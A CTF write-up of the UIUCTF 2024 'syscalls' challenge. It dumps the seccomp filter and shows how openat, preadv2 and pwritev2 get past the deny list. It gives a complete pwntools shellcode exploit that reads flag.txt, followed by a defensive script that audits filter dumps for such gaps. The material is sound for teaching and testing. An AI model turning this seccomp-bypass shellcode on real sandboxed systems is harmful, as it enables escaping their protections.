UIUCTF2024PWN


UIUCTF 2024

syscalls

Inspect the sandbox

└─# seccomp-tools dump '/home/ben/Desktop/attack_world/UIUCTF2024/syscall/syscalls'
The flag is in a file named flag.txt located in the same directory as this binary. That's all the information I can give you.
1
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x16 0xc000003e  if (A != ARCH_X86_64) goto 0024
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x13 0xffffffff  if (A != 0xffffffff) goto 0024
 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024
 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024
 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024
 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024
 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024
 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024
 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024
 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024
 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024
 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024
 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024
 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024
 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0018: 0x20 0x00 0x00 0x00000014  A = fd >> 32 # writev(fd, vec, vlen)
 0019: 0x25 0x03 0x00 0x00000000  if (A > 0x0) goto 0023
 0020: 0x15 0x00 0x03 0x00000000  if (A != 0x0) goto 0024
 0021: 0x20 0x00 0x00 0x00000010  A = fd # writev(fd, vec, vlen)
 0022: 0x25 0x00 0x01 0x000003e8  if (A <= 0x3e8) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x06 0x00 0x00 0x00000000  return KILL

execve is blocked, so the way in is an ORW (open/read/write) variant; fortunately I had saved a few variants earlier:

PWN heap overflow techniques: ORW solving approaches and universal gadgets - Anquanke (security news platform)

PWN-ORW summary - X1ng's Blog

[CTF]-PWN: a comprehensive analysis of ORW challenge types - CSDN Blog

O: replace open with openat (openat is not in the deny list).

R and W: replace read and write with the combination of preadv2 and pwritev2 (the filter denies read, pread64, readv and preadv, and write and pwritev, but never checks syscall numbers 327 and 328).

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

# O: openat(AT_FDCWD, "flag.txt", O_RDONLY, 0); the banner names the file flag.txt
shellcode = shellcraft.openat(-100, 'flag.txt', 0, 0)

shellcode += """
    /* R: preadv2(fd, iov, 1, -1, 0, 0) */
    mov rdi, rax            /* fd returned by openat */
    mov rax, 327            /* SYS_preadv2 */
    mov r12, rsp
    add r12, 0x50           /* iov_base: scratch buffer above the iovec */
    mov r11, 0x50           /* iov_len */
    push r11
    push r12                /* struct iovec { base, len } now sits at rsp */
    mov rsi, rsp            /* iov */
    mov rdx, 1              /* iovcnt */
    mov r10, -1             /* pos_l = -1: use the current file offset */
    mov r8, 0               /* pos_h */
    mov r9, 0               /* flags */
    syscall
    /* W: pwritev2(1, iov, 1, -1, 0, 0); the iovec and offset are still in place */
    mov rax, 328            /* SYS_pwritev2 */
    mov rdi, 1              /* stdout */
    syscall
"""

payload = asm(shellcode)
p = process("/home/ben/Desktop/attack_world/UIUCTF2024/syscall/syscalls")
p.sendlineafter(b"I can give you.", payload)
p.interactive()
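As an added example (not part of the original writeup), the following script audits a seccomp-tools dump for exactly the gap used above: for every syscall family the filter partially denies, it lists the members that still pass. The dump excerpt is taken from the listing above, while the family table and function names are my own; argument-conditional rules such as the writev fd check are not modelled, so writev is reported as allowed even though the filter only permits it for fd > 0x3e8.

```python
import re

# Excerpt of the seccomp-tools dump shown above; only the lines that
# name a syscall or a KILL target matter to this audit.
SAMPLE_DUMP = """\
 0005: 0x15 0x12 0x00 0x00000000  if (A == read) goto 0024
 0006: 0x15 0x11 0x00 0x00000001  if (A == write) goto 0024
 0007: 0x15 0x10 0x00 0x00000002  if (A == open) goto 0024
 0008: 0x15 0x0f 0x00 0x00000011  if (A == pread64) goto 0024
 0009: 0x15 0x0e 0x00 0x00000013  if (A == readv) goto 0024
 0010: 0x15 0x0d 0x00 0x00000028  if (A == sendfile) goto 0024
 0011: 0x15 0x0c 0x00 0x00000039  if (A == fork) goto 0024
 0012: 0x15 0x0b 0x00 0x0000003b  if (A == execve) goto 0024
 0013: 0x15 0x0a 0x00 0x00000113  if (A == splice) goto 0024
 0014: 0x15 0x09 0x00 0x00000127  if (A == preadv) goto 0024
 0015: 0x15 0x08 0x00 0x00000128  if (A == pwritev) goto 0024
 0016: 0x15 0x07 0x00 0x00000142  if (A == execveat) goto 0024
 0017: 0x15 0x00 0x05 0x00000014  if (A != writev) goto 0023
 0024: 0x06 0x00 0x00 0x00000000  return KILL
"""

# x86_64 syscalls that reach the same resource under a different number.
# (Hypothetical grouping for this audit; extend it for other families.)
FAMILIES = {
    "open":  {"open", "openat", "openat2"},
    "read":  {"read", "pread64", "readv", "preadv", "preadv2"},
    "write": {"write", "pwrite64", "writev", "pwritev", "pwritev2"},
    "exec":  {"execve", "execveat"},
}

def killed_syscalls(dump):
    """Syscall names whose equality check jumps straight to a KILL rule."""
    kill_labels = set(re.findall(r"^\s*(\d{4}):.*return KILL", dump, re.M))
    checks = re.findall(r"if \(A == (\w+)\) goto (\d{4})", dump)
    return {name for name, target in checks if target in kill_labels}

def denylist_gaps(dump):
    """For each family with at least one denied member, the members still allowed.

    Argument-conditional rules (e.g. the writev fd check) are not modelled.
    """
    denied = killed_syscalls(dump)
    return {fam: sorted(members - denied)
            for fam, members in FAMILIES.items() if members & denied}

if __name__ == "__main__":
    for fam, allowed in denylist_gaps(SAMPLE_DUMP).items():
        print(f"{fam:5s} still allowed: {allowed or 'none'}")
```

An empty list (as for exec here) means the family is fully covered; a non-empty one is the list a denylist author has to justify or close.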